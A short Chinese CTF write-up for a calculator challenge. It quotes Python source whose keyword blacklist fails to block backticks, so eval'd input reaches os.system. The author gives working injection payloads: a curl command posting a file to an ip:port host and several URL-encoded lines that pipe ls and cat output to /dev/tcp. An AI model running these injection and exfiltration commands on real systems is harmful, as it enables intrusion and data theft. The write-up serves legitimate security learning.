0x00 前言
比赛时几乎没看这道题
upgdstore感觉快出了就想搏一搏结果还是歇逼了…
弥补一下
0x01 brain.md
很常规的计算器
很贴心给了源码
# coding=utf-8
from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \
abort, send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time
def waf(s):
blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
'getattribute', 'func_globals', '__init__', 'join', '__dict__']
flag = True
for no in blacklist:
if no.lower() in s.lower():
flag = False
print(no)
break
return flag
while True:
num = input("num>>>")
log = "echo {0} {1} {2}> /tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)
if waf(num):
try:
data = eval(num)
os.system(log)
except:
print(data)
pass
else:
print("waf!!")
eval处被ban了很多 但是没ban反引号
注意到下面还有个os.system(log) 可以在这执行
不熟悉的建议本地搭着先试试
python eval
https://blog.csdn.net/qq_26442553/article/details/94396532
# coding=utf-8
from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \
abort, send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time
def waf(s):
blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
'getattribute', 'func_globals', '__init__', 'join', '__dict__']
flag = True
for no in blacklist:
if no.lower() in s.lower():
flag = False
print(no)
break
return flag
while True:
num = input("num>>>")
log = "echo {0} {1} > /tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), num)
if waf(num):
try:
data = eval(num)
os.system(log)
except (Exception, BaseException) as e:
print(e)
pass
else:
print("waf!!")
bash直接带
root@LAPTOP-RDTNMS90:/mnt/f/工具/工具/dirsearch/dirsearch-master# echo 1+1`ls`
1+1CHANGELOG.md CONTRIBUTORS.md db default.conf dirsearch.py Dockerfile lib logs README.md reports requirements.txt
python中为避免语法错误可加上注释符#
num>>>1+1`ls`
invalid syntax (<string>, line 1)
num>>>1+1#`ls`
num>>>
一种外带 一种直接弹回显
本质都一样
先执行 然后再外带看结果
1+1#`ls`
1+1#`curl -X GET -F xx=@tmp/log.txt http://ip:port/`
1%2b1%23`cat%09T*`
还有一种直接弹回显 本地测试的话shell必须为bash!(zsh报错
1%2b1%23`ls>/dev/tcp/ip/port`
1%2b1%23`cat%09T*>/dev/tcp/ip/port`
回看原始命令
也就是内联执行了ls>/dev/tcp/ip/port
echo 1+1#`ls>/dev/tcp/ip/port` >/tmp/log.txt
这种情况下log.txt不会带有内联执行的结果
0x02 rethink
少说话多做题